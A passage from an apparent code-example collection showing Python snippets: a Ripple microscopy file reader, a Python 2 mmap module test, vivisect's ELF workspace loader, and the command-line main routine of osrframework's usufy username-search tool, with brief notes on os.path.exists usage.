      time              str     # time in ISO 8601

    NOTES

    When 'data-length' is 1, the 'byte order' is not relevant as there is only
    one byte per datum, and 'byte-order' should be 'dont-care'.

    When 'depth' is 1, the file has one image, 'record-by' is not relevant and
    should be 'dont-care'. For spectral images, 'record-by' is 'vector'.
    For stacks of images, 'record-by' is 'image'.

    Floating point numbers can be IEEE 4-byte, or IEEE 8-byte. Therefore if
    data-type is float, data-length MUST be 4 or 8.

    The rpl file is read in a case-insensitive manner. However, when providing
    a dictionary as input, the keys MUST be lowercase.

    Comment lines, beginning with a semi-colon ';' are allowed anywhere.

    The first non-comment line in the rpl file MUST have two column names:
    'name_1'<TAB>'name_2'; any name would do e.g. 'key'<TAB>'value'.

    Parameters can be in ANY order.

    In the rpl file, the parameter name is followed by ONE tab (spaces are
    ignored) e.g.: 'data-length'<TAB>'2'

    In the rpl file, other data and more tabs can follow the two items on
    each row, and are ignored.

    Other keys and values can be included and are ignored.

    Any number of spaces can go along with each tab.

    """

    if not rpl_info:
        if filename[-3:] in file_extensions:
            with codecs.open(filename, encoding=encoding,
                             errors='replace') as f:
                rpl_info = parse_ripple(f)
        else:
            raise IOError('File has wrong extension: "%s"' % filename[-3:])
    for ext in ['raw', 'RAW']:
        rawfname = filename[:-3] + ext
        if os.path.exists(rawfname):
            break
        else:
            rawfname = ''
    if not rawfname:
        raise IOError('RAW file "%s" does not exist' % rawfname)
    else:
        data = read_raw(rpl_info, rawfname, mmap_mode=mmap_mode)

    if rpl_info['record-by'] == 'vector':
        _logger.info('Loading as Signal1D')
        record_by = 'spectrum'
    elif rpl_info['record-by'] == 'image':
        _logger.info('Loading as Signal2D')
        record_by = 'image'
    else:
        if len(data.shape) == 1:
            _logger.info('Loading as Signal1D')
            record_by = 'spectrum'
        else:
            _logger.info('Loading as Signal2D')
            record_by = 'image'

    if rpl_info['record-by'] == 'vector':
        idepth, iheight, iwidth = 2, 0, 1
        names = ['height', 'width', 'depth', ]
    else:
        idepth, iheight, iwidth = 0, 1, 2
        names = ['depth', 'height', 'width']

    scales = [1, 1, 1]
    origins = [0, 0, 0]
    units = ['', '', '']
    sizes = [rpl_info[names[i]] for i in range(3)]

    if 'date' not in rpl_info:
        rpl_info['date'] = ""

    if 'time' not in rpl_info:
        rpl_info['time'] = ""

    if 'signal' not in rpl_info:
        rpl_info['signal'] = ""

    if 'depth-scale' in rpl_info:
        scales[idepth] = rpl_info['depth-scale']
    # ev-per-chan is the only calibration supported by the original ripple
    # format
    elif 'ev-per-chan' in rpl_info:
        scales[idepth] = rpl_info['ev-per-chan']

    if 'depth-origin' in rpl_info:
        origins[idepth] = rpl_info['depth-origin']

    if 'depth-units' in rpl_info:
        units[idepth] = rpl_info['depth-units']

    if 'depth-name' in rpl_info:
        names[idepth] = rpl_info['depth-name']

    if 'width-origin' in rpl_info:
        origins[iwidth] = rpl_info['width-origin']

    if 'width-scale' in rpl_info:
        scales[iwidth] = rpl_info['width-scale']

    if 'width-units' in rpl_info:
        units[iwidth] = rpl_info['width-units']

    if 'width-name' in rpl_info:
        names[iwidth] = rpl_info['width-name']

    if 'height-origin' in rpl_info:
        origins[iheight] = rpl_info['height-origin']

    if 'height-scale' in rpl_info:
        scales[iheight] = rpl_info['height-scale']

    if 'height-units' in rpl_info:
        units[iheight] = rpl_info['height-units']

    if 'height-name' in rpl_info:
        names[iheight] = rpl_info['height-name']

    mp = DictionaryTreeBrowser({
        'General': {'original_filename': os.path.split(filename)[1],
                    'date': rpl_info['date'],
                    'time': rpl_info['time']},
        "Signal": {'signal_type': rpl_info['signal'],
                   'record_by': record_by},
    })
    if 'convergence-angle' in rpl_info:
        mp.set_item('Acquisition_instrument.TEM.convergence_angle',
                    rpl_info['convergence-angle'])
    if 'tilt-stage' in rpl_info:
        mp.set_item('Acquisition_instrument.TEM.tilt_stage',
                    rpl_info['tilt-stage'])
    if 'collection-angle' in rpl_info:
        mp.set_item('Acquisition_instrument.TEM.Detector.EELS.' +
                    'collection_angle',
                    rpl_info['collection-angle'])
    if 'beam-energy' in rpl_info:
        mp.set_item('Acquisition_instrument.TEM.beam_energy',
                    rpl_info['beam-energy'])
    if 'elevation-angle' in rpl_info:
        mp.set_item('Acquisition_instrument.TEM.Detector.EDS.elevation_angle',
                    rpl_info['elevation-angle'])
    if 'azimuth-angle' in rpl_info:
        mp.set_item('Acquisition_instrument.TEM.Detector.EDS.azimuth_angle',
                    rpl_info['azimuth-angle'])
    if 'energy-resolution' in rpl_info:
        mp.set_item('Acquisition_instrument.TEM.Detector.EDS.' +
                    'energy_resolution_MnKa',
                    rpl_info['energy-resolution'])
    if 'detector-peak-width-ev' in rpl_info:
        mp.set_item('Acquisition_instrument.TEM.Detector.EDS.' +
                    'energy_resolution_MnKa',
                    rpl_info['detector-peak-width-ev'])
    if 'live-time' in rpl_info:
        mp.set_item('Acquisition_instrument.TEM.Detector.EDS.live_time',
                    rpl_info['live-time'])

    axes = []
    index_in_array = 0
    for i in range(3):
        if sizes[i] > 1:
            axes.append({
                'size': sizes[i],
                'index_in_array': index_in_array,
                'name': names[i],
                'scale': scales[i],
                'offset': origins[i],
                'units': units[i],
            })
            index_in_array += 1

    dictionary = {
        'data': data.squeeze(),
        'axes': axes,
        'metadata': mp.as_dictionary(),
        'original_metadata': rpl_info
    }
    return [dictionary, ]
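
The reader locates the companion data file by probing both the "raw" and "RAW" extensions with os.path.exists and keeping the first match. A minimal sketch of that probe, using a hypothetical helper name:

import os

def find_raw_companion(rpl_filename):
    # Try the lowercase and uppercase extensions next to the .rpl file
    # and return the first candidate that exists on disk.
    for ext in ('raw', 'RAW'):
        candidate = rpl_filename[:-3] + ext
        if os.path.exists(candidate):
            return candidate
    raise IOError('RAW file for "%s" does not exist' % rpl_filename)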

Example 131

Project: babble
Source File: test_mmap.py
View license
def test_both():
    "Test mmap module on Unix systems and Windows"

    # Create a file to be mmap'ed.
    if os.path.exists(TESTFN):
        os.unlink(TESTFN)
    f = open(TESTFN, 'w+')

    try:    # unlink TESTFN no matter what
        # Write 2 pages worth of data to the file
        f.write('\0'* PAGESIZE)
        f.write('foo')
        f.write('\0'* (PAGESIZE-3) )
        f.flush()
        m = mmap.mmap(f.fileno(), 2 * PAGESIZE)
        f.close()

        # Simple sanity checks

        print type(m)  # SF bug 128713:  segfaulted on Linux
        print '  Position of foo:', m.find('foo') / float(PAGESIZE), 'pages'
        vereq(m.find('foo'), PAGESIZE)

        print '  Length of file:', len(m) / float(PAGESIZE), 'pages'
        vereq(len(m), 2*PAGESIZE)

        print '  Contents of byte 0:', repr(m[0])
        vereq(m[0], '\0')
        print '  Contents of first 3 bytes:', repr(m[0:3])
        vereq(m[0:3], '\0\0\0')

        # Modify the file's content
        print "\n  Modifying file's content..."
        m[0] = '3'
        m[PAGESIZE +3: PAGESIZE +3+3] = 'bar'

        # Check that the modification worked
        print '  Contents of byte 0:', repr(m[0])
        vereq(m[0], '3')
        print '  Contents of first 3 bytes:', repr(m[0:3])
        vereq(m[0:3], '3\0\0')
        print '  Contents of second page:',  repr(m[PAGESIZE-1 : PAGESIZE + 7])
        vereq(m[PAGESIZE-1 : PAGESIZE + 7], '\0foobar\0')

        m.flush()

        # Test doing a regular expression match in an mmap'ed file
        match = re.search('[A-Za-z]+', m)
        if match is None:
            print '  ERROR: regex match on mmap failed!'
        else:
            start, end = match.span(0)
            length = end - start

            print '  Regex match on mmap (page start, length of match):',
            print start / float(PAGESIZE), length

            vereq(start, PAGESIZE)
            vereq(end, PAGESIZE + 6)

        # test seeking around (try to overflow the seek implementation)
        m.seek(0,0)
        print '  Seek to zeroth byte'
        vereq(m.tell(), 0)
        m.seek(42,1)
        print '  Seek to 42nd byte'
        vereq(m.tell(), 42)
        m.seek(0,2)
        print '  Seek to last byte'
        vereq(m.tell(), len(m))

        print '  Try to seek to negative position...'
        try:
            m.seek(-1)
        except ValueError:
            pass
        else:
            verify(0, 'expected a ValueError but did not get it')

        print '  Try to seek beyond end of mmap...'
        try:
            m.seek(1,2)
        except ValueError:
            pass
        else:
            verify(0, 'expected a ValueError but did not get it')

        print '  Try to seek to negative position...'
        try:
            m.seek(-len(m)-1,2)
        except ValueError:
            pass
        else:
            verify(0, 'expected a ValueError but did not get it')

        # Try resizing map
        print '  Attempting resize()'
        try:
            m.resize(512)
        except SystemError:
            # resize() not supported
            # No messages are printed, since the output of this test suite
            # would then be different across platforms.
            pass
        else:
            # resize() is supported
            verify(len(m) == 512,
                    "len(m) is %d, but expecting 512" % (len(m),) )
            # Check that we can no longer seek beyond the new size.
            try:
                m.seek(513,0)
            except ValueError:
                pass
            else:
                verify(0, 'Could seek beyond the new size')

            # Check that the underlying file is truncated too
            # (bug #728515)
            f = open(TESTFN)
            f.seek(0, 2)
            verify(f.tell() == 512, 'Underlying file not truncated')
            f.close()
            verify(m.size() == 512, 'New size not reflected in file')

        m.close()

    finally:
        try:
            f.close()
        except OSError:
            pass
        try:
            os.unlink(TESTFN)
        except OSError:
            pass

    # Test for "access" keyword parameter
    try:
        mapsize = 10
        print "  Creating", mapsize, "byte test data file."
        open(TESTFN, "wb").write("a"*mapsize)
        print "  Opening mmap with access=ACCESS_READ"
        f = open(TESTFN, "rb")
        m = mmap.mmap(f.fileno(), mapsize, access=mmap.ACCESS_READ)
        verify(m[:] == 'a'*mapsize, "Readonly memory map data incorrect.")

        print "  Ensuring that readonly mmap can't be slice assigned."
        try:
            m[:] = 'b'*mapsize
        except TypeError:
            pass
        else:
            verify(0, "Able to write to readonly memory map")

        print "  Ensuring that readonly mmap can't be item assigned."
        try:
            m[0] = 'b'
        except TypeError:
            pass
        else:
            verify(0, "Able to write to readonly memory map")

        print "  Ensuring that readonly mmap can't be write() to."
        try:
            m.seek(0,0)
            m.write('abc')
        except TypeError:
            pass
        else:
            verify(0, "Able to write to readonly memory map")

        print "  Ensuring that readonly mmap can't be write_byte() to."
        try:
            m.seek(0,0)
            m.write_byte('d')
        except TypeError:
            pass
        else:
            verify(0, "Able to write to readonly memory map")

        print "  Ensuring that readonly mmap can't be resized."
        try:
            m.resize(2*mapsize)
        except SystemError:   # resize is not universally supported
            pass
        except TypeError:
            pass
        else:
            verify(0, "Able to resize readonly memory map")
        del m, f
        verify(open(TESTFN, "rb").read() == 'a'*mapsize,
               "Readonly memory map data file was modified")

        print "  Opening mmap with size too big"
        import sys
        f = open(TESTFN, "r+b")
        try:
            m = mmap.mmap(f.fileno(), mapsize+1)
        except ValueError:
            # we do not expect a ValueError on Windows
            # CAUTION:  This also changes the size of the file on disk, and
            # later tests assume that the length hasn't changed.  We need to
            # repair that.
            if sys.platform.startswith('win'):
                verify(0, "Opening mmap with size+1 should work on Windows.")
        else:
            # we expect a ValueError on Unix, but not on Windows
            if not sys.platform.startswith('win'):
                verify(0, "Opening mmap with size+1 should raise ValueError.")
            m.close()
        f.close()
        if sys.platform.startswith('win'):
            # Repair damage from the resizing test.
            f = open(TESTFN, 'r+b')
            f.truncate(mapsize)
            f.close()

        print "  Opening mmap with access=ACCESS_WRITE"
        f = open(TESTFN, "r+b")
        m = mmap.mmap(f.fileno(), mapsize, access=mmap.ACCESS_WRITE)
        print "  Modifying write-through memory map."
        m[:] = 'c'*mapsize
        verify(m[:] == 'c'*mapsize,
               "Write-through memory map memory not updated properly.")
        m.flush()
        m.close()
        f.close()
        f = open(TESTFN, 'rb')
        stuff = f.read()
        f.close()
        verify(stuff == 'c'*mapsize,
               "Write-through memory map data file not updated properly.")

        print "  Opening mmap with access=ACCESS_COPY"
        f = open(TESTFN, "r+b")
        m = mmap.mmap(f.fileno(), mapsize, access=mmap.ACCESS_COPY)
        print "  Modifying copy-on-write memory map."
        m[:] = 'd'*mapsize
        verify(m[:] == 'd' * mapsize,
               "Copy-on-write memory map data not written correctly.")
        m.flush()
        verify(open(TESTFN, "rb").read() == 'c'*mapsize,
               "Copy-on-write test data file should not be modified.")
        try:
            print "  Ensuring copy-on-write maps cannot be resized."
            m.resize(2*mapsize)
        except TypeError:
            pass
        else:
            verify(0, "Copy-on-write mmap resize did not raise exception.")
        del m, f
        try:
            print "  Ensuring invalid access parameter raises exception."
            f = open(TESTFN, "r+b")
            m = mmap.mmap(f.fileno(), mapsize, access=4)
        except ValueError:
            pass
        else:
            verify(0, "Invalid access code should have raised exception.")

        if os.name == "posix":
            # Try incompatible flags, prot and access parameters.
            f = open(TESTFN, "r+b")
            try:
                m = mmap.mmap(f.fileno(), mapsize, flags=mmap.MAP_PRIVATE,
                              prot=mmap.PROT_READ, access=mmap.ACCESS_WRITE)
            except ValueError:
                pass
            else:
                verify(0, "Incompatible parameters should raise ValueError.")
            f.close()
    finally:
        try:
            os.unlink(TESTFN)
        except OSError:
            pass

    print '  Try opening a bad file descriptor...'
    try:
        mmap.mmap(-2, 4096)
    except mmap.error:
        pass
    else:
        verify(0, 'expected a mmap.error but did not get it')

    # Do a tougher .find() test.  SF bug 515943 pointed out that, in 2.2,
    # searching for data with embedded \0 bytes didn't work.
    f = open(TESTFN, 'w+')

    try:    # unlink TESTFN no matter what
        data = 'aabaac\x00deef\x00\x00aa\x00'
        n = len(data)
        f.write(data)
        f.flush()
        m = mmap.mmap(f.fileno(), n)
        f.close()

        for start in range(n+1):
            for finish in range(start, n+1):
                slice = data[start : finish]
                vereq(m.find(slice), data.find(slice))
                vereq(m.find(slice + 'x'), -1)
        m.close()

    finally:
        os.unlink(TESTFN)

    # make sure a double close doesn't crash on Solaris (Bug# 665913)
    f = open(TESTFN, 'w+')

    try:    # unlink TESTFN no matter what
        f.write(2**16 * 'a') # Arbitrary character
        f.close()

        f = open(TESTFN)
        mf = mmap.mmap(f.fileno(), 2**16, access=mmap.ACCESS_READ)
        mf.close()
        mf.close()
        f.close()

    finally:
        os.unlink(TESTFN)

    # test mapping of entire file by passing 0 for map length
    if hasattr(os, "stat"):
        print "  Ensuring that passing 0 as map length sets map size to current file size."
        f = open(TESTFN, "w+")

        try:
            f.write(2**16 * 'm') # Arbitrary character
            f.close()

            f = open(TESTFN, "rb+")
            mf = mmap.mmap(f.fileno(), 0)
            verify(len(mf) == 2**16, "Map size should equal file size.")
            vereq(mf.read(2**16), 2**16 * "m")
            mf.close()
            f.close()

        finally:
            os.unlink(TESTFN)

    # test mapping of entire file by passing 0 for map length
    if hasattr(os, "stat"):
        print "  Ensuring that passing 0 as map length sets map size to current file size."
        f = open(TESTFN, "w+")
        try:
            f.write(2**16 * 'm') # Arbitrary character
            f.close()

            f = open(TESTFN, "rb+")
            mf = mmap.mmap(f.fileno(), 0)
            verify(len(mf) == 2**16, "Map size should equal file size.")
            vereq(mf.read(2**16), 2**16 * "m")
            mf.close()
            f.close()

        finally:
            os.unlink(TESTFN)

    # make sure move works everywhere (64-bit format problem earlier)
    f = open(TESTFN, 'w+')

    try:    # unlink TESTFN no matter what
        f.write("ABCDEabcde") # Arbitrary character
        f.flush()

        mf = mmap.mmap(f.fileno(), 10)
        mf.move(5, 0, 5)
        verify(mf[:] == "ABCDEABCDE", "Map move should have duplicated front 5")
        mf.close()
        f.close()

    finally:
        os.unlink(TESTFN)

    # Test that setting access to PROT_READ gives exception
    # rather than crashing
    if hasattr(mmap, "PROT_READ"):
        try:
            mapsize = 10
            open(TESTFN, "wb").write("a"*mapsize)
            f = open(TESTFN, "rb")
            m = mmap.mmap(f.fileno(), mapsize, prot=mmap.PROT_READ)
            try:
                m.write("foo")
            except TypeError:
                pass
            else:
                verify(0, "PROT_READ is not working")
        finally:
            os.unlink(TESTFN)
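
The test starts by deleting any leftover TESTFN with an exists/unlink pair. A minimal sketch of that cleanup, with a hypothetical helper name:

import os

def remove_if_present(path):
    # Delete the file only when os.path.exists says it is there,
    # as the top of the test above does for TESTFN.
    if os.path.exists(path):
        os.unlink(path)

The check-then-delete pair can race with other processes; catching the missing-file error from os.unlink directly (OSError here, FileNotFoundError on Python 3) closes that window.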

Example 132

Project: vivisect
Source File: elf.py
View license
def loadElfIntoWorkspace(vw, elf, filename=None):

    arch = arch_names.get(elf.e_machine)
    if arch == None:
       raise Exception("Unsupported Architecture: %d\n", elf.e_machine)

    platform = elf.getPlatform()

    # setup needed platform/format
    vw.setMeta('Architecture', arch)
    vw.setMeta('Platform', platform)
    vw.setMeta('Format', 'elf')

    vw.setMeta('DefaultCall', archcalls.get(arch,'unknown'))

    vw.addNoReturnApi("*.exit")

    # Base addr is earliest section address rounded to pagesize
    # NOTE: This is only for prelink'd so's and exe's.  Make something for old style so.
    addbase = False
    if not elf.isPreLinked() and elf.isSharedObject():
        addbase = True
    baseaddr = elf.getBaseAddress()

    #FIXME make filename come from dynamic's if present for shared object
    if filename == None:
        filename = "elf_%.8x" % baseaddr

    fhash = "unknown hash"
    if os.path.exists(filename):
        fhash = v_parsers.md5File(filename)

    fname = vw.addFile(filename.lower(), baseaddr, fhash)

    strtabs = {}
    secnames = []
    for sec in elf.getSections():
        secnames.append(sec.getName())

    pgms = elf.getPheaders()
    secs = elf.getSections()

    for pgm in pgms:
        if pgm.p_type == Elf.PT_LOAD:
            if vw.verbose: vw.vprint('Loading: %s' % (repr(pgm)))
            bytez = elf.readAtOffset(pgm.p_offset, pgm.p_filesz)
            bytez += "\x00" * (pgm.p_memsz - pgm.p_filesz)
            pva = pgm.p_vaddr
            if addbase: pva += baseaddr
            vw.addMemoryMap(pva, pgm.p_flags & 0x7, fname, bytez) #FIXME perms
        else:
            if vw.verbose: vw.vprint('Skipping: %s' % repr(pgm))

    if len(pgms) == 0:
        # fall back to loading sections as best we can...
        if vw.verbose: vw.vprint('elf: no program headers found!')

        maps = [ [s.sh_offset,s.sh_size] for s in secs if s.sh_offset and s.sh_size ]
        maps.sort()

        merged = []
        for i in xrange(len(maps)):

            if merged and maps[i][0] == (merged[-1][0] + merged[-1][1]):
                merged[-1][1] += maps[i][1]
                continue

            merged.append( maps[i] )

        baseaddr = 0x05000000
        for offset,size in merged:
            bytez = elf.readAtOffset(offset,size)
            vw.addMemoryMap(baseaddr + offset, 0x7, fname, bytez)

        for sec in secs:
            if sec.sh_offset and sec.sh_size:
                sec.sh_addr = baseaddr + sec.sh_offset

    # First add all section definitions so we have them
    for sec in secs:
        sname = sec.getName()
        size = sec.sh_size
        if sec.sh_addr == 0:
            continue # Skip non-memory mapped sections

        sva = sec.sh_addr
        if addbase: sva += baseaddr

        vw.addSegment(sva, size, sname, fname)

    # Now trigger section specific analysis
    for sec in secs:
        #FIXME dup code here...
        sname = sec.getName()
        size = sec.sh_size
        if sec.sh_addr == 0:
            continue # Skip non-memory mapped sections

        sva = sec.sh_addr
        if addbase: sva += baseaddr

        if sname == ".interp":
            vw.makeString(sva)

        elif sname == ".init":
            vw.makeName(sva, "init_function", filelocal=True)
            vw.addEntryPoint(sva)

        elif sname == ".fini":
            vw.makeName(sva, "fini_function", filelocal=True)
            vw.addEntryPoint(sva)

        elif sname == ".dynamic": # Imports
            makeDynamicTable(vw, sva, sva+size)

        # FIXME section names are optional, use dynamic info from .dynamic
        elif sname == ".dynstr": # String table for dynamics
            makeStringTable(vw, sva, sva+size)

        elif sname == ".dynsym":
            #print "LINK",sec.sh_link
            for s in makeSymbolTable(vw, sva, sva+size):
                pass
                #print "########################.dynsym",s

        # If the section is really a string table, do it
        if sec.sh_type == Elf.SHT_STRTAB:
            makeStringTable(vw, sva, sva+size)

        elif sec.sh_type == Elf.SHT_SYMTAB:
            makeSymbolTable(vw, sva, sva+size)

        elif sec.sh_type == Elf.SHT_REL:
            makeRelocTable(vw, sva, sva+size, addbase, baseaddr)

        if sec.sh_flags & Elf.SHF_STRINGS:
            print "FIXME HANDLE SHF STRINGS"

    # Let pyelf do all the stupid string parsing...
    for r in elf.getRelocs():
        rtype = Elf.getRelocType(r.r_info)
        rlva = r.r_offset
        if addbase: rlva += baseaddr
        try:
            # If it has a name, it's an externally
            # resolved "import" entry, otherwise, just a regular reloc
            if arch in ('i386','amd64'):

                name = r.getName()
                if name:
                    if rtype == Elf.R_386_JMP_SLOT:
                        vw.makeImport(rlva, "*", name)

                    # FIXME elf has conflicting names for 2 relocs?
                    #elif rtype == Elf.R_386_GLOB_DAT:
                        #vw.makeImport(rlva, "*", name)

                    elif rtype == Elf.R_386_32:
                        pass

                    else:
                        vw.verbprint('unknown reloc type: %d %s (at %s)' % (rtype, name, hex(rlva)))

            if arch == 'arm':
                name = r.getName()
                if name:
                    if rtype == Elf.R_ARM_JUMP_SLOT:
                        vw.makeImport(rlva, "*", name)

                    else:
                        vw.verbprint('unknown reloc type: %d %s (at %s)' % (rtype, name, hex(rlva)))

        except vivisect.InvalidLocation, e:
            print "NOTE",e

    for s in elf.getDynSyms():
        stype = s.getInfoType()
        sva = s.st_value
        if sva == 0:
            continue
        if addbase: sva += baseaddr
        if sva == 0:
            continue

        if stype == Elf.STT_FUNC or (stype == Elf.STT_GNU_IFUNC and arch in ('i386','amd64')):   # HACK: linux is what we're really after.
            try:
                vw.addExport(sva, EXP_FUNCTION, s.name, fname)
                vw.addEntryPoint(sva)
            except Exception, e:
                vw.vprint('addExport Failure: %s' % e)

        elif stype == Elf.STT_OBJECT:
            if vw.isValidPointer(sva):
                try:
                    vw.addExport(sva, EXP_DATA, s.name, fname)
                except Exception, e:
                    vw.vprint('WARNING: %s' % e)

        elif stype == Elf.STT_HIOS:
            # Apparently Elf64 binaries on amd64 use STT_HIOS and then
            # store the value in s.st_other, so handle that case here.
            sva = s.st_other
            if addbase: sva += baseaddr
            if vw.isValidPointer(sva):
                try:
                    vw.addExport(sva, EXP_FUNCTION, s.name, fname)
                    vw.addEntryPoint(sva)
                except Exception, e:
                    vw.vprint('WARNING: %s' % e)

        elif stype == 14:  # FIXME: undocumented info type seen in the wild
            # Same workaround as the STT_HIOS case above: the actual
            # address is stored in s.st_other.
            sva = s.st_other
            if addbase: sva += baseaddr
            if vw.isValidPointer(sva):
                try:
                    vw.addExport(sva, EXP_DATA, s.name, fname)
                except Exception, e:
                    vw.vprint('WARNING: %s' % e)

        else:
            pass
            #print "DYNSYM DYNSYM",repr(s),s.getInfoType(),'other',hex(s.st_other)

    for d in elf.getDynamics():
        if d.d_tag == Elf.DT_NEEDED:
            name = d.getName()
            name = name.split('.')[0].lower()
            vw.addLibraryDependancy(name)
        else:
            pass
            #print "DYNAMIC DYNAMIC DYNAMIC",d


    for s in elf.getSymbols():
        sva = s.st_value
        if addbase: sva += baseaddr
        if vw.isValidPointer(sva) and len(s.name):
            try:
                vw.makeName(sva, s.name, filelocal=True)
            except Exception, e:
                print "WARNING:",e

    if vw.isValidPointer(elf.e_entry):
        vw.addExport(elf.e_entry, EXP_FUNCTION, '__entry', fname)
        vw.addEntryPoint(elf.e_entry)
        
    if vw.isValidPointer(baseaddr):
        vw.makeStructure(baseaddr, "elf.Elf32")

    return fname
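
A side note on the long elif chain over section names above (.interp, .init, .fini, .dynamic, .dynstr, .dynsym): the same dispatch can also be expressed as a name-to-handler table. The sketch below is illustrative only; the handler functions are stand-ins for the vivisect workspace calls used above (vw.makeString, vw.makeName/vw.addEntryPoint, makeDynamicTable, and so on), not part of any real API.

def handle_interp(sva, size):
    print("interp string at 0x%x" % sva)

def handle_entry(sva, size):
    print("entry point at 0x%x" % sva)

# Hypothetical handler table mirroring the elif chain above.
SECTION_HANDLERS = {
    ".interp": handle_interp,
    ".init": handle_entry,
    ".fini": handle_entry,
}

def dispatch_section(name, sva, size):
    handler = SECTION_HANDLERS.get(name)
    if handler is not None:
        handler(sva, size)

dispatch_section(".init", 0x8048000, 0x20)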

Example 133

Project: osrframework
Source File: usufy.py
View license
def main(args):
    '''
        Main function. It is written this way so that other applications can reuse the full configuration capabilities of this tool.
    '''
    # Recovering the logger
    # Calling the logger when being imported
    osrframework.utils.logger.setupLogger(loggerName="osrframework.usufy", verbosity=args.verbose, logFolder=args.logfolder)
    # From now on, the logger can be recovered like this:
    logger = logging.getLogger("osrframework.usufy")
    # Printing the results if requested
    if not args.maltego:
        print banner.text

        sayingHello = """usufy.py Copyright (C) F. Brezo and Y. Rubio (i3visio) 2016
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it under certain conditions. For additional info, visit <http://www.gnu.org/licenses/gpl-3.0.txt>."""
        logger.info(sayingHello)
        print sayingHello
        print
        logger.info("Starting usufy.py...")

    if args.license:
        logger.info("Looking for the license...")
        # showing the license
        try:
            with open ("COPYING", "r") as iF:
                contenido = iF.read().splitlines()
                for linea in contenido:
                    print linea
        except Exception:
            try:
                # Trying to recover the COPYING file...
                with open ("/usr/share/osrframework/COPYING", "r") as iF:
                    contenido = iF.read().splitlines()
                    for linea in contenido:
                        print linea
            except:
                logger.error("ERROR: there has been an error when opening the COPYING file.\n\tThe file contains the terms of the GPLv3 under which this software is distributed.\n\tIn case of doubts, verify the integrity of the files or contact [email protected]")
    elif args.fuzz:
        logger.info("Performing the fuzzing tasks...")
        res = fuzzUsufy(args.fuzz, args.fuzz_config)
        logger.info("Recovered platforms:\n" + str(res))
    else:
        logger.debug("Recovering the list of platforms to be processed...")
        # Recovering the list of platforms to be launched
        listPlatforms = platform_selection.getPlatformsByName(platformNames=args.platforms, tags=args.tags, mode="usufy")
        logger.debug("Platforms recovered.")

        if args.info:
            # Information actions...
            if args.info == 'list_platforms':
                infoPlatforms="Listing the platforms:\n"
                for p in listPlatforms:
                    infoPlatforms += "\t\t" + (str(p) + ": ").ljust(16, ' ') + str(p.tags)+"\n"
                logger.info(infoPlatforms)
                return infoPlatforms
            elif args.info == 'list_tags':
                logger.info("Listing the tags:")
                tags = {}
                # Going through all the selected platforms to get their tags
                for p in listPlatforms:
                    for t in p.tags:
                        if t not in tags.keys():
                            tags[t] = 1
                        else:
                            tags[t] += 1
                infoTags = "List of tags:\n"
                # Displaying the results in a sorted list
                for t in tags.keys():
                    infoTags += "\t\t" + (t + ": ").ljust(16, ' ') + str(tags[t]) + "  time(s)\n"
                logger.info(infoTags)
                return infoTags
            else:
                pass

        # performing the test
        elif args.benchmark:
            logger.warning("The benchmark mode may take several minutes, as it performs queries similar to the ones the program runs in production.")
            logger.info("Launching the benchmarking tests...")
            platforms = platform_selection.getAllPlatformNames("usufy")
            res = benchmark.doBenchmark(platforms)
            strTimes = ""
            for e in sorted(res.keys()):
                strTimes += str(e) + "\t" + str(res[e]) + "\n"
            logger.info(strTimes)
            return strTimes
        # Executing the corresponding process...
        else:
            # Showing the execution time...
            if not args.maltego:
                startTime= dt.datetime.now()
                print str(startTime) +"\tStarting search in " + str(len(listPlatforms)) + " platform(s)... Relax!\n"

            # Defining the list of users to monitor
            nicks = []
            logger.debug("Recovering nicknames to be processed...")
            if args.nicks:
                for n in args.nicks:
                    # TO-DO
                    #     A trick to avoid having the processing of the properties when being queried by Maltego
                    if "properties.i3visio" not in n:
                        nicks.append(n)
            else:
                # Reading the nick files
                try:
                    nicks = args.list.read().splitlines()
                except:
                    logger.error("ERROR: there has been an error when opening the file that stores the nicks.\tPlease, check the existence of this file.")

            # Defining the results
            res = []

            if args.output_folder != None:
                # An output folder was selected, so verify and prepare it
                logger.debug("Preparing the output folder...")
                if not args.maltego:
                    if not os.path.exists(args.output_folder):
                        logger.warning("The output folder \'" + args.output_folder + "\' does not exist. The system will try to create it.")
                        os.makedirs(args.output_folder)
                # Launching the process...
                try:
                    res = processNickList(nicks, listPlatforms, args.output_folder, avoidProcessing = args.avoid_processing, avoidDownload = args.avoid_download, nThreads=args.threads, verbosity= args.verbose, logFolder=args.logfolder)
                except Exception as e:
                    print "Exception grabbed when processing the nicks: " + str(e)
                    print traceback.print_stack()
            else:
                try:
                    res = processNickList(nicks, listPlatforms, nThreads=args.threads, verbosity= args.verbose, logFolder=args.logfolder)
                except Exception as e:
                    print "Exception grabbed when processing the nicks: " + str(e)
                    print traceback.print_stack()

            logger.info("Listing the results obtained...")
            # We are going to iterate over the results...
            strResults = "\t"

            # Structure returned
            """
            [
                {
                  "attributes": [
                    {
                      "attributes": [],
                      "type": "i3visio.uri",
                      "value": "http://twitter.com/i3visio"
                    },
                    {
                      "attributes": [],
                      "type": "i3visio.alias",
                      "value": "i3visio"
                    },
                    {
                      "attributes": [],
                      "type": "i3visio.platform",
                      "value": "Twitter"
                    }
                  ],
                  "type": "i3visio.profile",
                  "value": "Twitter - i3visio"
                }
                ,
                ...
            ]
            """
            for r in res:
                # The format of the results (attributes) for a given nick is a list as follows:

                for att in r["attributes"]:
                    # iterating through the attributes
                    platform = ""
                    uri = ""
                    for details in att["attributes"]:
                        if details["type"] == "i3visio.platform":
                            platform = details["value"]
                        if details["type"] == "i3visio.uri":
                            uri = details["value"]
                    try:
                        strResults+= (str(platform) + ":").ljust(16, ' ')+ " "+ str(uri)+"\n\t\t"
                    except:
                        pass

                logger.info(strResults)

            # Generating summary files for each ...
            if args.extension:
                # Storing the file...
                logger.info("Creating output files as requested.")
                if not args.maltego:
                    # Verifying if the outputPath exists
                    if not os.path.exists(args.output_folder):
                        logger.warning("The output folder \'" + args.output_folder + "\' does not exist. The system will try to create it.")
                        os.makedirs(args.output_folder)

                # Grabbing the results
                fileHeader = os.path.join(args.output_folder, args.file_header)

                # Iterating through the given extensions to print its values
                if not args.maltego:
                    for ext in args.extension:
                        # Generating output files
                        general.exportUsufy(res, ext, fileHeader)

            # Generating the Maltego output
            if args.maltego:
                general.listToMaltego(res)

            # Printing the results if requested
            if not args.maltego:
                print "A summary of the results obtained is shown in the following table:"
                #print res
                print unicode(general.usufyToTextExport(res))

                print

                if args.web_browser:
                    general.openResultsInBrowser(res)

                print "You can find all the information collected in the following files:"
                for ext in args.extension:
                    # Showing the output files
                    print "\t-" + fileHeader + "." + ext

            # Showing the execution time...
            if not args.maltego:
                print
                endTime= dt.datetime.now()
                print str(endTime) +"\tFinishing execution..."
                print
